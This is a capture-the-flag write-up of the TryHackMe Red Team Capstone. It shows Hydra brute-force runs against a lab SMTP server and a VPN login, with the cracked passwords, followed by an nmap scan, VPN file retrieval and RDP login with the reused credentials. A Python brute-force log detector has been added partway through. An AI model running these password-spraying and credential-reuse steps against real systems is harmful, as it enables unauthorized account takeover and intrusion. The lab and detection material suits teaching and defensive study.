To breach the perimeter, we target the public-facing VPN server. Given its connection to the internal network, it presents a prime opportunity for initial exploitation.
```
┌──(kali㉿kali)-[~/Desktop/THM/Red Team Capstone/Capstone_Challenge_Resources]
└─$ hydra -L usernames.txt -P passwords.txt mail.thereserve.loc smtp
Hydra v9.5 (c) 2023 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2024-11-12 13:10:10
[INFO] several providers have implemented cracking protection, check with a small wordlist first - and stay legal!
[DATA] max 16 tasks per 1 server, overall 16 tasks, 10800 login tries (l:15/p:720), ~675 tries per task
[DATA] attacking smtp://mail.thereserve.loc:25/
[STATUS] 986.00 tries/min, 986 tries in 00:01h, 9814 to do in 00:10h, 16 active
[STATUS] 1009.67 tries/min, 3029 tries in 00:03h, 7771 to do in 00:08h, 16 active
[25][smtp] host: mail.thereserve.loc   login: laura.wood@corp.thereserve.loc   password: Password1@
[STATUS] 1109.14 tries/min, 7764 tries in 00:07h, 3036 to do in 00:03h, 16 active
[25][smtp] host: mail.thereserve.loc   login: mohammad.ahmed@corp.thereserve.loc   password: Password1!
1 of 1 target successfully completed, 2 valid passwords found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2024-11-12 13:19:33
```
We can reuse the same username and password lists to perform a brute-force attack on the VPN login as well.
```
┌──(kali㉿kali)-[~/Desktop/THM/Red Team Capstone/Capstone_Challenge_Resources]
└─$ hydra -L usernames.txt -P passwords.txt vpn.thereserve.loc http-get-form "/login.php:user=^USER^&password=^PASS^:Please check your username or password" -v
Hydra v9.5 (c) 2023 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2024-11-12 13:10:02
[DATA] max 16 tasks per 1 server, overall 16 tasks, 10800 login tries (l:15/p:720), ~675 tries per task
[DATA] attacking http-get-form://vpn.thereserve.loc:80/login.php:user=^USER^&password=^PASS^:Please check your username or password
[VERBOSE] Resolving addresses ... [VERBOSE] resolving done
[STATUS] 944.00 tries/min, 944 tries in 00:01h, 9856 to do in 00:11h, 16 active
[STATUS] 964.67 tries/min, 2894 tries in 00:03h, 7906 to do in 00:09h, 16 active
[VERBOSE] Page redirected to http[s]://vpn.thereserve.loc:80/vpncontrol.php
[80][http-get-form] host: vpn.thereserve.loc   login: laura.wood@corp.thereserve.loc   password: Password1@
[STATUS] 1058.43 tries/min, 7409 tries in 00:07h, 3391 to do in 00:04h, 16 active
[VERBOSE] Page redirected to http[s]://vpn.thereserve.loc:80/vpncontrol.php
[80][http-get-form] host: vpn.thereserve.loc   login: mohammad.ahmed@corp.thereserve.loc   password: Password1!
[STATUS] attack finished for vpn.thereserve.loc (waiting for children to complete tests)
1 of 1 target successfully completed, 2 valid passwords found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2024-11-12 13:19:52
```
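Both Hydra runs above leave the same footprint on the server side: roughly a thousand failed logins per minute from one source, then a success. As an added example (not part of the original post), this Python detector parses constructed nginx access-log lines for the portal's GET /login.php form and constructed Postfix SASL failure lines, alerts when a source crosses a failure threshold inside a sliding window, and alerts again when that same source later authenticates. The log formats, the source IP 198.51.100.23 and the guessed password values are assumptions.

```python
import re
from collections import defaultdict, deque
from datetime import datetime, timedelta

# Assumed formats: nginx combined access log and Postfix smtpd SASL warnings; all sample lines are constructed.
NGINX_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^ \]]+) [^\]]*\] "\S+ (?P<path>\S+) [^"]*" (?P<status>\d{3})')
POSTFIX_RE = re.compile(r'^(?P<ts>\w{3} +\d+ \d\d:\d\d:\d\d) \S+ postfix/smtpd\[\d+\]: warning: \S+\[(?P<ip>[\d.]+)\]: SASL \w+ authentication failed')

def parse_events(nginx_lines, postfix_lines, year=2024):
    """Normalise both sources to sorted (timestamp, source_ip, service, outcome) tuples."""
    events = []
    for line in nginx_lines:
        m = NGINX_RE.match(line)
        if not m or not m.group("path").startswith("/login.php"):
            continue
        ts = datetime.strptime(m.group("ts"), "%d/%b/%Y:%H:%M:%S")
        # A bad login gets 200 plus the error text; a good one redirects to vpncontrol.php (what Hydra keyed on).
        events.append((ts, m.group("ip"), "vpn", "success" if m.group("status") == "302" else "fail"))
    for line in postfix_lines:
        m = POSTFIX_RE.match(line)
        if m:  # syslog timestamps carry no year, so one is supplied
            ts = datetime.strptime(f"{year} {m.group('ts')}", "%Y %b %d %H:%M:%S")
            events.append((ts, m.group("ip"), "smtp", "fail"))
    return sorted(events)

def detect_bruteforce(events, window=timedelta(minutes=1), threshold=20):
    """Alert once per (ip, service) reaching `threshold` failures inside `window`, and again on a later success."""
    alerts, recent, flagged = [], defaultdict(deque), set()
    for ts, ip, svc, outcome in events:
        key = (ip, svc)
        if outcome == "fail":
            q = recent[key]
            q.append(ts)
            while ts - q[0] > window:  # drop failures that fell out of the window
                q.popleft()
            if len(q) >= threshold and key not in flagged:
                flagged.add(key)
                alerts.append(("bruteforce", ip, svc, ts))
        elif key in flagged:  # the spraying source just got in: a password was guessed
            alerts.append(("bruteforce_success", ip, svc, ts))
    return alerts

def sample_nginx(ip="198.51.100.23", n_fail=25):
    """Constructed traffic: n_fail failed GET /login.php guesses one second apart, then one 302."""
    base = datetime(2024, 11, 12, 13, 10, 0)
    return [f'{ip} - - [{(base + timedelta(seconds=i)).strftime("%d/%b/%Y:%H:%M:%S")} +0000] '
            f'"GET /login.php?user=laura.wood%40corp.thereserve.loc&password=guess{i:03d} HTTP/1.1" '
            f'{302 if i == n_fail else 200} 1432' for i in range(n_fail + 1)]

SAMPLE_POSTFIX = ["Nov 12 13:10:11 mail postfix/smtpd[2210]: warning: unknown[198.51.100.23]: SASL LOGIN authentication failed: authentication failure"]
```

Because the portal takes credentials through a GET form, every guess, including the correct one, lands in the access log in clear text, so the log needs the same handling as the credentials themselves.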
Breach
With these accounts, we can attempt to log into the webmail application, the VPN server (to obtain a VPN file assigned to the users), and, if fortunate, potentially gain Active Directory credentials. Ignoring the potential MySQL vulnerabilities for now, we focus on the webmail login.
After successfully logging into both accounts, we find that, unfortunately, nothing useful is located in the mailboxes.
Upon examining the VPN server, we successfully log in and retrieve two `.ovpn` files. The form prompts us to submit an account name. On login, it’s pre-filled with `laura.wood@corp.thereserve.loc`. Testing with my own name in the same format also works successfully.
At the start of the challenge, during the first attempt, the routes were configured correctly, allowing us to successfully reach the internal network IPs 10.200.XXX.21 and 10.200.XXX.22, both of which are WRK machines within the internal network.
WRKX Recon (10.200.XXX.21, 10.200.XXX.22)
Scanning both hosts reveals their FQDNs (WRK_.corp.thereserve.loc) and that each has Remote Desktop Protocol (RDP, port 3389) open.
That is an interesting observation: if the local and domain credentials are consistent, we may be able to log in over RDP with the Active Directory accounts we already have.
After the scan, we identify a fourth machine with ports 80 and 443 exposed, serving an HTTP/HTTPS web page. When accessing the IP in the browser, the page loads with a white background, displaying no content or errors.
By checking the source code, we discover that the web page is associated with the Swift Bank web application, as indicated by the static links present in the JavaScript code.
After adding the hostname to the hosts file, we can now successfully access the Swift Bank web application.
We can also run an Nmap scan against the Swift Bank web application to identify any open ports and services that might be exposed.
```
┌──(kali㉿kali)-[~/Desktop/THM/Red Team Capstone]
└─$ nmap -sC -sV swift.bank.thereserve.loc -T4
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-11-12 15:29 IST
Nmap scan report for swift.bank.thereserve.loc (10.200.118.201)
Host is up (0.31s latency).
Not shown: 997 closed tcp ports (conn-refused)
PORT    STATE SERVICE   VERSION
22/tcp  open  ssh       OpenSSH 8.2p1 Ubuntu 4ubuntu0.5 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   3072 1f:42:2d:f5:4d:c6:fa:41:b1:d9:42:5b:d2:b4:bd:2e (RSA)
|   256 7f:64:d1:9d:6a:5a:a6:6f:c1:85:ff:7a:ae:d0:39:ef (ECDSA)
|_  256 b6:e5:97:2f:47:5d:24:2c:51:84:f0:ea:69:df:58:47 (ED25519)
80/tcp  open  http      nginx 1.18.0 (Ubuntu)
|_http-title: The Reserve Online
|_http-server-header: nginx/1.18.0 (Ubuntu)
443/tcp open  ssl/https
|_http-title: Site doesn't have a title (text/plain; charset=utf-8).
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject: commonName=localhost/stateOrProvinceName=Utah/countryName=US
| Not valid before: 2022-09-26T13:22:15
|_Not valid after:  2023-09-26T13:22:15
| tls-alpn: 
|   h2
|_  http/1.1
| fingerprint-strings: 
|   FourOhFourRequest: 
|     HTTP/1.0 404 Not Found
|     Content-Type: text/plain; charset=utf-8
|     Vary: Origin
|     X-Content-Type-Options: nosniff
|     Date: Tue, 12 Nov 2024 09:59:40 GMT
|     Content-Length: 19
|     404 page not found
|   GenericLines, Help, Kerberos, LPDString, RTSPRequest, SSLSessionReq, TLSSessionReq, TerminalServerCookie: 
|     HTTP/1.1 400 Bad Request
|     Content-Type: text/plain; charset=utf-8
|     Connection: close
|     400 Bad Request
|   GetRequest: 
|     HTTP/1.0 404 Not Found
|     Content-Type: text/plain; charset=utf-8
|     Vary: Origin
|     X-Content-Type-Options: nosniff
|     Date: Tue, 12 Nov 2024 09:59:36 GMT
|     Content-Length: 19
|     404 page not found
|   HTTPOptions: 
|     HTTP/1.0 404 Not Found
|     Content-Type: text/plain; charset=utf-8
|     Vary: Origin
|     X-Content-Type-Options: nosniff
|     Date: Tue, 12 Nov 2024 09:59:38 GMT
|     Content-Length: 19
|_    404 page not found
|_http-cors: GET POST DELETE OPTIONS
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 163.31 seconds
```
It seems that, for now, we are unable to do much with the application, as only ports 22, 80, and 443 are available.
By using Remmina and reusing the credentials of laura.wood, we successfully establish a connection to the WRK1 machine.
Flags 1 - 3
NOTE: We are now able to obtain the following flags by following the instructions on the e-citizen platform:
Flag 1: Breaching the Perimeter
Flag 2: Breaching Active Directory
Flag 3: Foothold on Corporate Division Tier 2 Infrastructure